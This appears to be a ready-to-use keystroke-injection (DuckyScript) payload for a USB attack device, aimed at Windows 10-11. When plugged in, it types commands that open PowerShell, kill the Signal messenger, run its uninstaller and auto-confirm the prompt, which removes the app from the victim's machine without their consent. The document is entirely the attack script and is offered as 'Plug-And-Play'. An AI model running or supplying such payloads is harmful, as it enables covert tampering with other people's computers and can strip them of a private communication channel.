* #####################################
* #                                   |
* # Title        : Uninstall Signal   |
* # Author       : Aleff              |
* # Version      : 1.0                |
* # Category     : Execution          |
* # Target       : Windows 10-11      |
* #                                   |
* #####################################

* Plug-And-Play <3

* Requirements:
*   - Signal App installed
*   - ExecutionPolicy Bypass

DELAY 2000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000

STRING Stop-Process -Name "Signal"
ENTER
DELAY 500
STRING  Start-Process "$env:LocalAppData\Programs\signal-desktop\Uninstall Signal.exe"
ENTER
DELAY 1000
* Popup "Are you sure?"
ENTER
ALT F4
